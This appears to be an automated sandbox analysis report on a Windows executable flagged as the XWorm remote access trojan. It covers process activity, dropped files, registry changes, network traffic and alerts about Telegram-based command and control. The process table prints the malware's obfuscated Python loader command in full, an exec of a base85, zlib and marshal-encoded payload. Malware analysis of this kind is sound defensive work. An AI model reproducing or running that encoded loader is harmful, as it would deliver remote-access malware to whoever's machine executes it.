| File name: | d57adb24b010d644315933e7030cbdbc.exe |
| Full analysis: | https://app.any.run/tasks/ff99facc-95ef-4f5e-8549-1df332b82eee |
| Verdict: | Malicious activity |
| Threats: | XWorm is a remote access trojan (RAT) sold as a malware-as-a-service. It possesses an extensive hacking toolset and is capable of gathering private information and files from the infected computer, hijacking MetaMask and Telegram accounts, and tracking user activity. XWorm is typically delivered to victims' computers through multi-stage attacks that start with phishing emails. |
| Analysis date: | December 06, 2024, 15:28:42 |
| OS: | Windows 10 Professional (build: 19045, 64 bit) |
| Tags: | |
| Indicators: | |
| MIME: | application/vnd.microsoft.portable-executable |
| File info: | PE32+ executable (console) x86-64, for MS Windows, 6 sections |
| MD5: | D57ADB24B010D644315933E7030CBDBC |
| SHA1: | 6D2C83CE9D75B3E1DA11C3FBC1B25FDC3944537B |
| SHA256: | BC43E925D7B4B74319F6E74E836A96F1997BA404E14AC566CF12A21E9DA463DB |
| SSDEEP: | 1572864:cUZqRxRp/OvvmR/9MqX+fzS+Uriw/qC9su:/ZqRxRp2nmR/N+fjUriwH+u |
MALICIOUS
Executing a file with an untrusted certificate
- d57adb24b010d644315933e7030cbdbc.exe (PID: 7076)
XWORM has been detected (SURICATA)
- AddInProcess32.exe (PID: 6292)
Connects to the CnC server
- AddInProcess32.exe (PID: 6292)
SUSPICIOUS
Process drops legitimate windows executable
- d57adb24b010d644315933e7030cbdbc.exe (PID: 7076)
Starts CMD.EXE for commands execution
- d57adb24b010d644315933e7030cbdbc.exe (PID: 7076)
Process drops python dynamic module
- d57adb24b010d644315933e7030cbdbc.exe (PID: 7076)
Executes application which crashes
- olx.exe (PID: 6924)
There is functionality for taking screenshot (YARA)
- vlc.exe (PID: 4056)
Executable content was dropped or overwritten
- d57adb24b010d644315933e7030cbdbc.exe (PID: 7076)
The process drops C-runtime libraries
- d57adb24b010d644315933e7030cbdbc.exe (PID: 7076)
Process communicates with Telegram (possibly using it as an attacker's C2 server)
- AddInProcess32.exe (PID: 6292)
Contacting a server suspected of hosting an CnC
- AddInProcess32.exe (PID: 6292)
INFO
Checks supported languages
- d57adb24b010d644315933e7030cbdbc.exe (PID: 7076)
- vlc.exe (PID: 4056)
Creates files or folders in the user directory
- d57adb24b010d644315933e7030cbdbc.exe (PID: 7076)
Reads the computer name
- vlc.exe (PID: 4056)
The process uses Lua
- vlc.exe (PID: 4056)
Sends debugging messages
- vlc.exe (PID: 4056)
Attempting to use instant messaging service
- AddInProcess32.exe (PID: 6292)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
TRiD
| .exe | | | InstallShield setup (91.4) |
|---|---|---|
| .exe | | | Generic Win/DOS Executable (4.2) |
| .exe | | | DOS Executable Generic (4.2) |
EXIF
EXE
| MachineType: | AMD AMD64 |
|---|---|
| TimeStamp: | 2024:12:06 07:43:29+00:00 |
| ImageFileCharacteristics: | Executable, Large address aware |
| PEType: | PE32+ |
| LinkerVersion: | 14.41 |
| CodeSize: | 195584 |
| InitializedDataSize: | 71047680 |
| UninitializedDataSize: | - |
| EntryPoint: | 0x2d91c |
| OSVersion: | 6 |
| ImageVersion: | - |
| SubsystemVersion: | 6 |
| Subsystem: | Windows command line |
| FileVersionNumber: | 0.1.1.0 |
| ProductVersionNumber: | 0.1.1.0 |
| FileFlagsMask: | 0x003f |
| FileFlags: | (none) |
| FileOS: | Windows NT 32-bit |
| ObjectFileType: | Executable application |
| FileSubtype: | - |
| LanguageCode: | Neutral |
| CharacterSet: | Unicode |
| ProductName: | recoveroop |
| FileVersion: | 0.1.1 |
| ProductVersion: | 0.1.1 |
| FileDescription: | recoveroop |
Total processes
127
Monitored processes
9
Malicious processes
3
Suspicious processes
0
Behavior graph
Click at the process to see the details
Process information
PID | CMD | Path | Indicators | Parent process | |||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| 4056 | "C:\Program Files\VideoLAN\VLC\vlc.exe" --started-from-file "C:\Users\admin\AppData\Roaming\marke.mp4" | C:\Program Files\VideoLAN\VLC\vlc.exe | cmd.exe | ||||||||||||
User: admin Company: VideoLAN Integrity Level: MEDIUM Description: VLC media player Version: 3.0.11 Modules
| |||||||||||||||
| 4076 | "C:/recover/pw/pw.exe" -c exec(__import__('marshal').loads(__import__('zlib').decompress(__import__('base64').b85decode('c$|ee*>>VcmTX?q>0Byn&8+IKa(iiGw{s)`PJFxr5+FbrEg^_AZKtG=5okdOVHRV*WY6h-nTPp<s>l9|`GWZX{-Azgo+czaJFD}YnSrCYHzIB<ca4avMLzo_@OOs4ffJ2HPy|J-2z-E17!6?z#zGi}@en3pB7_TYA%u%?F@#HSDTK>#IfPH(lMt@Jl@LCKPeZs0S3~#=KEp6(J-1)L7tvtNxD~Ts!j~bQu)eTg!B_T|@XN5iV0~qO4ZjZYMe7^;Tlj5=FInH&ui<O^4SZvN55EuFmaQM`-@)I7_!H~*_K)z#5MQx=ve)36{Rj95dmXOZ8*szkgqvaCQ)|oqBmASi4Y%ziOyagxeFr_$cdirYIePJz1l&b0(HDP-z(1i^=t~Uu&{ybd4Bw(}(6<==3;GVd#*olsKfgq8eu+X7eUE;?EtF26-|6Is7)<Gup862QvqyzU^7p?68sL)A`4^g}E53fE^&Cgn{7%oojZf75G}5&m(vz`yVqhrb{Hd#&=$g7RY(>Kqi3`OyFkE~ji_hcdv@lN;XdyLUxv1m?@~VDLUtp3rFPvlWD(_8PUvgZp=i`M6imxOW=8L0_gDh*lpiVsfdj9p}ZiY@LnD$B?USI3pe97%~93LZ3<ub=eTwZKl(0I*-f?Ved^94CyI_KvJsmzJ<m4|^7UmwgDJ>4IAju!om*#&qUfBC@lR&e1*evZx}zhJTaJ<0|APOXkQUkMnqT~8kjl2Pv~O!xPQ_Zox$UOpQ5UdL&lc;DgbvtXJSE>@ypU5ou@ttI>|e_ZRo!nOP;ihjWVyBLby#oLj)#6wFV^5-A#7H08TY_{+^@@-@moh|sW8SeQe64VifcR_Fbb>x9277O4}P>UZ3bb5484c-acd3-5883-ae5d-000aa204eed3 p;1;5xHByG!Z=4+q=ct0*XJ5`^~)n-#oL#&+*yfEcVd%K=&}}b>tjNDH`dg{lqNsAuyu^_iG?eFW~jpK(JV&39B>k=L??VwDo!1(w+ID;<~zn0v%(eB$wt1gq1&!oBCuP73R_IJl-4n^Jr(D&<w>3rTkF5!Nol8Y3Ub%0E60UG=cxCv7e$pM3<w>vDN6y=$q&U#=Yd{(qDM|Lg}Y*F$=@Xzr|ih?qV3nK_<lGexw_nMRAF_MzMd7-z7pR!~>g1#<^c#2AoCb3r^3`^kl+Y3b*Cxqxo{JUZAh&^X7aB+e={J$p!BZ!PeJ<VmBaM(K@c7d%iyQ=Zg>c=PW)|^ug8R1V0A5T@G1YjlPOvvm!rdEcO^Z;~%BsNB$bQ#%6?Ke_8giF$d-p7+JXef3p7gqg8$x4Bfy*8%yQS&;K=chb?jz`&%TC!`~tw9`*env3^W=*eUjcU~AaxVs8oWkHNO1>ffUejDBKe<tWg9;5sLpA6;W3GW~Yk^WGj=Jx#F&CvQK|BxBxMFzku$3~k-RzK>fz2{4>D{mB&YEE^wZeG~QGeJ+{!Z&m*0(YgH?R%Y}U{0~_CIq~4^-Z!DWdQXDc{}dD};r=_e+w=S@Y@FWPkl%1SIR1H^n;<j=R=eU2l&k+ml|k2|Dgz-60!6(H)Oh&$W}iiV6N#pgPm$;@hCM%qV+6Lre^_h+;~y<{!H>@pI5xzvmj_2+ENorEcnrlud>P|$lnC)B*k2cBPcZe0zc5>wEo1Ddzc_n3Tf*4tY!#cy0_S}n@URnj@=rlQ1k5kZ7gc4T@2ByRkj*^A`Y_Ce+=P}HDj{^f<g@vg0d+QWr8@y7x(XfrMIe&jitok8$oi4uIi?Q;_Obp&Fyd2NFy>j{BL8Tbui`1xj`P^LghRvwf(_&W3CP27LCdFc&jQL%)#s0zdR+K(Wj;41s@Fju^%)3f5OBW|TgEYHHM$ZHoHT&JKN0h4xKsI0?7dZi@T&ru=Ox67otz*MbX#Ir7MP603%M!}Oh2S)xSSwaj7BqT!(?&-!Q~_g<Z3dR23?kHHC;|AF#wUkhjykbo9PViSagLN4*|oq8nWcI%*=%%wMj`%XX<j=QwwY_Z*jEJMNXq>$pT=YUL2=1k;QX!4XF!?b&f7f81a39-5f63-5b42-9efd-1f13b5431005amp;_UC^i!mR+T|6rVDQ7T{Z4f#DUJt?(u2)ktojqyR5ChAedav~Efj8KAtzuskp3T*(GDUu0!yBAYY)fkZManxeAqSPi|Pk<erZttOY(^9SR4;hYk?$c8Dl!8_(y1Xf<Qa<wYi$Vel%#L0{xF}aCW(lRYF2U=6BtT{}+MfE7&Bn`dWN};^pln8?mi-WXCv<SY7Xx@UnC}jk$YvdcE(d7zONtgUe!$gI=4GW^2zTp{O;JaL^C1lf$X^YZL1UcHW)h>M_SX@&tjxr6YeN#=Hk9gbi0cE9mi<RVVj*|hyR;FBCV{%p_#axJVyMkp*2ozsYi@w7FnpAAd5Ny8>Fu%GD#D;k=5G{7fTf8CxX)Koz%hL?skl36`Sowy8dNqJ5f^;zAY-!RUp{<QvTLOTsF$Te#%v1x`1X?^%vv{vUv~Ls&W%!~|l^jlyD7U7Gz^()KLN^a6v00|%66YYm0G=54>msby3LKUp2lD19RiSuC07go17?~q9LM^eRK#yICAakO{b=4*^)k5xq7h#brvCZn_zyhL~#$%Y8l!1cHw^~?pfMg3biB$mEtH@1Yh*Q{9>2X;ul+!K8;*iCaWI9t8K#t)}APE%H2aJ(wb+V(HgT|uFR$FqW)F1$bOs>wG?f^<gy=5{JPy|yfgSsTqX;oy0I&DmO$%48KWkjJVZ<AF`<nxf>%19cdI3m;FNYF)HtFGYjb<wCo!gaW5dn$JMsnlfm715a1OmmvIT}K9-iySc2WY`7tnB_?XTBJ$vDVS1C&Jpc{8l;(Ky;++=hY>_uB1OD+v56WW)gvpZTpl`nN3fv6Q@kuowMv~HkGKMuC<N!o*k?J0<urRR;R~2Qf@^A1&ev%uX;j;jZKJP{uwS9lo-DDVLXjn@nd4vy>yk1GxP8hM$+FaT71_4x*yoB3*=;H$VzefzNERw+AlHQ=mx9D-1WBVKTbv-5+&(Ju8I^J;Jg}+&`$0?M@g%6H+nK6l^Ch0<yu8yO5s|TFnw%&SM~X!Y>rxv_l0Oj`x5*KZl4-*fB`XD|G$8>Nf+^x)lN;427w_3k@gnjRlPo~eVj5!G69~G}AQ__8WvaZzw73#itr2ivBoW)P%2d6;_<}sHa3ZRTB}U|B-;zr?50dOiuy`L43|(j3u0{hKr(j+ywx=qQ9r5QbEty6Ml(Y#Tty*nzPy{l{X|_=k0i;xd%qx^ea+KSL1*@W^_=zOK0gw)q8f9Im4jAwN04W7rNM{V8%hWa7?dH4KcDp<co2`j#vo*e3Bjw__!aF!VNJx>2T&rHlbv58BHL*pia;5;JK(|a@%^xt>PHaVlQ<-sX%>nyZj*3F{DwSz2$4Qxe{OS^04g*z_$*2~OeXDoFQT|k<5v2sSP~uA*#d|`5ovOvLsMzL2Vj9>+NfY}|g~MyhG(SRed4fi6QKLXcYq|{}`+d1&kf4~IDxHIrKxJGh<tn<(<P`=QDxGn0%#vDNkQRv6l$R~OX5yGFvUyc1Pld@KBXq5)M7X8AV`jvZF;?jsQK7hEgRmg586MazN+p?U!$v3bb5484c-acd3-5883-ae5d-000aa204eed3 l1M08RLdOqbjFxKn(a2k+!&I~NF#``E|I2C08n*ulm>VY+H^$)wJ|9ADS<Yqnq%dpt}zDY;6^aHh6oG^w+W(zW0r(%yxSnPj$eQlkZTj4Xqj%eMvwivlxgyXTuzk_Jl$rSwMH+a)650-eG)ouO)$+HmBe;STB#Osfa?ciq031Po2OMOGvsXF7Npv=Wpa5%hJ4L7G6Fz8UZaQzh+{n9G?}dDP1Mnu9D!{=k9ne@g*t+W&pO(;kZ49|rSMvyJ;gD$ieny>WDZIM!-z#g<SEn_i~K$)SwkGZtGr}PY9%CtlvJsSOhFMFo*?@zzQ{4U$c$SP->Q{>0qi!(SveaKJwmoQ9(1|B3L0t9v>=Y7eYIfF5}m0xaGaAFw%KTMP%M&^c#eIu#3{PT-GCD6s}9fO^TMlH$Zw@`RZw7Mu3*%~f;Pc+;WcC<#Yt`-6d?rN+(0k&Quuw{<YevOqS1S}b4Z}h=l`!e$?@?&JsK7s-y7jYmBK}E5w#+B(GUi=>gdn0@ZyRemchfxPke~{5(}PDA0k1H179#>T=+`F55y%~@dk#1-~9f>#gFs_tEZsBe3cnGVg5nHt@EX})l>0XA-Mpb2hYZ<@Kqn)(YWAxRuAvmVPjA2>Y5K%^|7W8G37O$=ktr)qBnFL-79>2TLl;L=fS013@&Vc#SCg2XUP_MU1{$(z{%`<?~FTH<BPg1%UtQ8w>c%nPO`F7CXds{$^iL?mNU-jQdfDuP7eC(w{HI8UAb{B;Mkt*oKr=<bhDE^Ub7t0@5&vjQKHlI?XlO+kGB=-UB;MJGnIXBSUoM$w>ORI?RXQP)^~KL+GIN-Ctc{ucxQw1F4;q~b97(bIeQP@ukRlZ_tu)@d~%Y^n8sQCqMCiT!OScoS-sr8mKgm&=p4K|RLfrfR%rqx)~|T3GQG<b%U0Q;+s#{_KyB^Dm|mA}2Dg^6cMU7jFjFs|wA}04PRS!Tw;P>VU%V+$?E50%b2JpQWnf)2)bWTksCT=AoiiHBM_XEEn_*8z?=JPrBD=d^INz?_A00KD8xvH^Tc_RA<k36&m{>P%vlF*{-WP<kqtTdW_d#~->9lu%uB%tO8UN;-U#m9@d2v&?NuE<^&oOVE^9e~?@5YAhg2^B`6`{_Q_f*^NbKNz)bEe!%buTj$*kn^~k@w~OE#>xzza4EIUepe9+k15{dClYp)+H(Db+B8X_Gj(m-D4+fb~}S(tGwx*_ggm}C*;}F{R-VK4@~3mtUTUrfbH#M3J(0^J1W&Y9gVh!@V$iwD1TohE-tq>hsKTWbuZ5)RUQ?OuMRl0HLMnj<n>8<dZrGDgJ~~SrgzfS;kKl2()awj%AR!!JJs!b6<u#Cn?9=z`OY59U0u|QIpkgK?AN@(@%7#~dsi{m8^*TMmy4`WQztv;TJ`<?)op$4{kY5Rc85FLTiHXCEvkig>wPIXD)5%?<kreAB91Pn{hf}k@l{c_F6@@B9-MO-cT18Eb36XtVT#zSSBK)@sH&2)p(`KDz_a_AR)+N}Gthh|=yyft=Axx-$Zn0U9d{4!%A&}skhmbGW8X_@>ub&46x2@Et4yP`cJ3c-qS-F?+<R?n{Z!cZTJMj*;h5CGa5KB56xpNR{?%bol26MgS?25%5nGL&Qc|nc+hW1ti7GhRxX{kdPWaaGk$!YL>BII-fz3|dQ}raTRtK58k>9>_H+gR3x+ZKlbTyS-YqmPawzN|}*D8a4FTYcU*T<XF_MIje)81^Wvpu2L&$t8NzHeOLUG5L3Lu+lfdRs_c37e-kH|mv$)YF@KZE{_ZS{ugwy0q!-Z)H<w`I~I^J!Ov(a`$?pvC(A*#~qf>uetZV%XMLRa@jc&o4bRfnUTF~U)E}e8|Ddg(wl|jop<}&wBWR^RkD*TtM%QTd`VS=UGMZVZI#~N^=_4QVHeg?RXCiOW#ROwE!-Vgx3{??e{{chnJyOmv$5LW*YfEh;U4S_jSaenk90+;XqWk{DW}%Q-01#TwwShb*{1HccaPqcJEv{!thZh2T~ntQvU+f55a{r<PF^2%dlxydwU<ktTF2GHZ2Fe+hwJO7h2Hta&1nVg3Widu>&NQkNFx|%4|~PC&f!MsezKooOOU7-bYtUwj~?f<X>ph>Ii-vHTv^WbXA<_9$+cBo>uIi!My>7Bn^C3HD|xp}L-XF3io$-m!WVP9x2?+NcIv*6N+0`Zl9Nv=hif~Bm2B~3GCIunsKWl<@QM`+TW;3g$!4bG9q(p)C+qshbTU1U^#(A}9rPUU1P5ohH0WC$Ur)isfid(u7F_o9{!kzIm?}6V<}pu)OVf^f-Ldp}tkZ+b_?XcBj;+rVLAH9nG8n3^*VFXD!233s^2tb72R+TyeJ?oXyjZx7p$rVGqk2I~#!G}vuHuJH!2t-rb0^BcA>Rgvj`kMm-rL7~h_@IVG0(#McJFQeAuSXn*}UMW2@_27myf*{L)GeN6@3zBo8Zc*<D{rCx!^qw4=OD@6us48WRM{8o(Dyc|MY@1Bz*Be@D>kzp!_1}dKDBwPA|-+J!EK-|D2%-6E;D9!aE3x;NY7l!u@|bD?c5W%SUz(4K4j75YQk<e7Ipk@@1Is_$n-a!0=UUIkx<Ad0{!e9AA0899>yhjr|WeX=~>')))) | C:\recover\pw\pw.exe | — | d57adb24b010d644315933e7030cbdbc.exe | |||||||||||
User: admin Company: Python Software Foundation Integrity Level: MEDIUM Description: Python Exit code: 0 Version: 3.10.11 Modules
| |||||||||||||||
| 6292 | "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe" | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | olx.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: AddInProcess.exe Version: 4.8.9037.0 built by: NET481REL1 Modules
| |||||||||||||||
| 6736 | \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1 | C:\Windows\System32\conhost.exe | — | olx.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Console Window Host Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 6780 | C:\WINDOWS\system32\WerFault.exe -u -p 6924 -s 80 | C:\Windows\System32\WerFault.exe | olx.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Problem Reporting Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 6924 | "C:\recover\olx.exe" | C:\recover\olx.exe | d57adb24b010d644315933e7030cbdbc.exe | ||||||||||||
User: admin Company: The Qt Company Ltd. Integrity Level: MEDIUM Description: Qt Balsam Exit code: 3221226505 Version: 5.15.2.0 Modules
| |||||||||||||||
| 7076 | "C:\Users\admin\AppData\Local\Temp\d57adb24b010d644315933e7030cbdbc.exe" | C:\Users\admin\AppData\Local\Temp\d57adb24b010d644315933e7030cbdbc.exe | explorer.exe | ||||||||||||
User: admin Integrity Level: MEDIUM Description: recoveroop Exit code: 0 Version: 0.1.1 Modules
| |||||||||||||||
| 7088 | \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1 | C:\Windows\System32\conhost.exe | — | d57adb24b010d644315933e7030cbdbc.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Console Window Host Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 7144 | "cmd" /C start C:\Users\admin\AppData\Roaming\marke.mp4 | C:\Windows\System32\cmd.exe | — | d57adb24b010d644315933e7030cbdbc.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
Total events
6 526
Read events
6 510
Write events
16
Delete events
0
Modification events
| (PID) Process: | (7144) cmd.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.mp4\OpenWithProgids |
| Operation: | write | Name: | VLC.mp4 |
Value: | |||
| (PID) Process: | (7144) cmd.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached |
| Operation: | write | Name: | {F81B1B56-7613-4EE4-BC05-1FAB5DE5C07E} {886D8EEB-8CF2-4446-8D02-CDBA1DBDCF99} 0xFFFF |
Value: 0100000000000000F5EC6E95F347DB01 | |||
| (PID) Process: | (6292) AddInProcess32.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\AddInProcess32_RASAPI32 |
| Operation: | write | Name: | EnableFileTracing |
Value: 0 | |||
| (PID) Process: | (6292) AddInProcess32.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\AddInProcess32_RASAPI32 |
| Operation: | write | Name: | EnableAutoFileTracing |
Value: 0 | |||
| (PID) Process: | (6292) AddInProcess32.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\AddInProcess32_RASAPI32 |
| Operation: | write | Name: | EnableConsoleTracing |
Value: 0 | |||
| (PID) Process: | (6292) AddInProcess32.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\AddInProcess32_RASAPI32 |
| Operation: | write | Name: | FileTracingMask |
Value: | |||
| (PID) Process: | (6292) AddInProcess32.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\AddInProcess32_RASAPI32 |
| Operation: | write | Name: | ConsoleTracingMask |
Value: | |||
| (PID) Process: | (6292) AddInProcess32.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\AddInProcess32_RASAPI32 |
| Operation: | write | Name: | MaxFileSize |
Value: 1048576 | |||
| (PID) Process: | (6292) AddInProcess32.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\AddInProcess32_RASAPI32 |
| Operation: | write | Name: | FileDirectory |
Value: %windir%\tracing | |||
| (PID) Process: | (6292) AddInProcess32.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\AddInProcess32_RASMANCS |
| Operation: | write | Name: | EnableFileTracing |
Value: 0 | |||
Executable files
148
Suspicious files
605
Text files
1 355
Unknown types
2
Dropped files
PID | Process | Filename | Type | |
|---|---|---|---|---|
| 7076 | d57adb24b010d644315933e7030cbdbc.exe | C:\Users\admin\AppData\Roaming\marke.mp4 | — | |
MD5:— | SHA256:— | |||
| 7076 | d57adb24b010d644315933e7030cbdbc.exe | C:\recover\recover.dll | — | |
MD5:— | SHA256:— | |||
| 7076 | d57adb24b010d644315933e7030cbdbc.exe | C:\recover\olx.exe | executable | |
MD5:8AEE66FE642D154F32E5AFF380DA188B | SHA256:94C5E2FBF60BBABF8E026178ED50D0E56C31B274300BD633C050FFDCB1F4510F | |||
| 7076 | d57adb24b010d644315933e7030cbdbc.exe | C:\recover\msvcp140_1.dll | executable | |
MD5:69D96E09A54FBC5CF92A0E084AB33856 | SHA256:A3A1199DE32BBBC8318EC33E2E1CE556247D012851E4B367FE853A51E74CE4EE | |||
| 7076 | d57adb24b010d644315933e7030cbdbc.exe | C:\recover\libcrypto-3-x64.dll | executable | |
MD5:93659803EC56A97680F36DE12798E7B0 | SHA256:BB7630C52F50031D850529B4B6100F8B9DF84AAE095D18E402B14C5C8D786AAB | |||
| 7076 | d57adb24b010d644315933e7030cbdbc.exe | C:\recover\msvcp140.dll | executable | |
MD5:1BA6D1CF0508775096F9E121A24E5863 | SHA256:74892D9B4028C05DEBAF0B9B5D9DC6D22F7956FA7D7EEE00C681318C26792823 | |||
| 7076 | d57adb24b010d644315933e7030cbdbc.exe | C:\recover\msvcp140_2.dll | executable | |
MD5:E7A91F7C9D91F0F7857632436B121781 | SHA256:63F1A20CB17EC5E0CA4EBEA870B68740F24E063E28B235C3C8B58A3D8F57A9C4 | |||
| 7076 | d57adb24b010d644315933e7030cbdbc.exe | C:\recover\msvcp140_atomic_wait.dll | executable | |
MD5:21F3417BBD33CBB9F1886E86C7240D1A | SHA256:7E02EFE075B7DD385992F621FDE34728EF7C2D4CF090B127B093D0835345F8FE | |||
| 7076 | d57adb24b010d644315933e7030cbdbc.exe | C:\recover\msvcp140_codecvt_ids.dll | executable | |
MD5:A3D300560D9C554790B3E6EA50E33D0F | SHA256:3BD90DB2F147899C65FE279F3E44AC48F5598CD0C23A09C0410BE072A4C96070 | |||
| 7076 | d57adb24b010d644315933e7030cbdbc.exe | C:\recover\Qt5Gui.dll | executable | |
MD5:47307A1E2E9987AB422F09771D590FF1 | SHA256:5E7D2D41B8B92A880E83B8CC0CA173F5DA61218604186196787EE1600956BE1E | |||
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
13
TCP/UDP connections
38
DNS requests
22
Threats
22
HTTP requests
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
|---|---|---|---|---|---|---|---|---|---|
4712 | MoUsoCoreWorker.exe | GET | 200 | 2.16.241.12:80 | http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl | unknown | — | — | whitelisted |
5160 | svchost.exe | GET | 200 | 2.16.241.12:80 | http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl | unknown | — | — | whitelisted |
— | — | GET | 200 | 2.16.241.12:80 | http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl | unknown | — | — | whitelisted |
5160 | svchost.exe | GET | 200 | 88.221.169.152:80 | http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl | unknown | — | — | whitelisted |
— | — | GET | 200 | 88.221.169.152:80 | http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl | unknown | — | — | whitelisted |
4712 | MoUsoCoreWorker.exe | GET | 200 | 88.221.169.152:80 | http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl | unknown | — | — | whitelisted |
1176 | svchost.exe | GET | 200 | 192.229.221.95:80 | http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAJ0LqoXyo4hxxe7H%2Fz9DKA%3D | unknown | — | — | whitelisted |
— | — | GET | 200 | 192.229.221.95:80 | http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTrjrydRyt%2BApF3GSPypfHBxR5XtQQUs9tIpPmhxdiuNkHMEWNpYim8S8YCEAI5PUjXAkJafLQcAAsO18o%3D | unknown | — | — | whitelisted |
6436 | backgroundTaskHost.exe | GET | 200 | 192.229.221.95:80 | http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQ50otx%2Fh0Ztl%2Bz8SiPI7wEWVxDlQQUTiJUIBiV5uNu5g%2F6%2BrkS7QYXjzkCEAn5bsKVVV8kdJ6vHl3O1J0%3D | unknown | — | — | whitelisted |
4716 | SIHClient.exe | GET | 200 | 88.221.169.152:80 | http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Update%20Secure%20Server%20CA%202.1.crl | unknown | — | — | whitelisted |
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
Connections
PID | Process | IP | Domain | ASN | CN | Reputation |
|---|---|---|---|---|---|---|
— | — | 40.119.249.228:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | SG | whitelisted |
4 | System | 192.168.100.255:137 | — | — | — | whitelisted |
4712 | MoUsoCoreWorker.exe | 2.16.241.12:80 | crl.microsoft.com | Akamai International B.V. | DE | whitelisted |
5160 | svchost.exe | 2.16.241.12:80 | crl.microsoft.com | Akamai International B.V. | DE | whitelisted |
— | — | 2.16.241.12:80 | crl.microsoft.com | Akamai International B.V. | DE | whitelisted |
— | — | 88.221.169.152:80 | www.microsoft.com | AKAMAI-AS | DE | whitelisted |
4712 | MoUsoCoreWorker.exe | 88.221.169.152:80 | www.microsoft.com | AKAMAI-AS | DE | whitelisted |
5160 | svchost.exe | 88.221.169.152:80 | www.microsoft.com | AKAMAI-AS | DE | whitelisted |
4 | System | 192.168.100.255:138 | — | — | — | whitelisted |
5064 | SearchApp.exe | 2.23.209.187:443 | www.bing.com | Akamai International B.V. | GB | whitelisted |
DNS requests
Domain | IP | Reputation |
|---|---|---|
settings-win.data.microsoft.com |
| whitelisted |
google.com |
| whitelisted |
crl.microsoft.com |
| whitelisted |
www.microsoft.com |
| whitelisted |
www.bing.com |
| whitelisted |
login.live.com |
| whitelisted |
ocsp.digicert.com |
| whitelisted |
go.microsoft.com |
| whitelisted |
arc.msn.com |
| whitelisted |
fd.api.iris.microsoft.com |
| whitelisted |
Threats
PID | Process | Class | Message |
|---|---|---|---|
2192 | svchost.exe | Misc activity | ET HUNTING Telegram API Domain in DNS Lookup |
6292 | AddInProcess32.exe | Misc activity | ET HUNTING Observed Telegram API Domain (api .telegram .org in TLS SNI) |
6292 | AddInProcess32.exe | Misc activity | ET HUNTING Telegram API Certificate Observed |
6292 | AddInProcess32.exe | Malware Command and Control Activity Detected | REMOTE [ANY.RUN] Xworm TCP Packet |
18 ETPRO signatures available at the full report
Process | Message |
|---|---|
vlc.exe | main libvlc debug: VLC media player - 3.0.11 Vetinari
|
vlc.exe | main libvlc debug: configured with ../extras/package/win32/../../../configure '--enable-update-check' '--enable-lua' '--enable-faad' '--enable-flac' '--enable-theora' '--enable-avcodec' '--enable-merge-ffmpeg' '--enable-dca' '--enable-mpc' '--enable-libass' '--enable-schroedinger' '--enable-realrtsp' '--enable-live555' '--enable-dvdread' '--enable-shout' '--enable-goom' '--enable-caca' '--enable-qt' '--enable-skins2' '--enable-sse' '--enable-mmx' '--enable-libcddb' '--enable-zvbi' '--disable-telx' '--enable-nls' '--host=x86_64-w64-mingw32' '--with-breakpad=https://win.crashes.videolan.org' 'host_alias=x86_64-w64-mingw32' 'PKG_CONFIG_LIBDIR=/home/jenkins/workspace/vlc-release/windows/vlc-release-win32-x64/contrib/x86_64-w64-mingw32/lib/pkgconfig'
|
vlc.exe | main libvlc debug: revision 3.0.11-0-gdc0c5ced72
|
vlc.exe | main libvlc debug: Copyright © 1996-2020 the VideoLAN team
|
vlc.exe | main libvlc debug: min period: 1 ms, max period: 1000000 ms
|
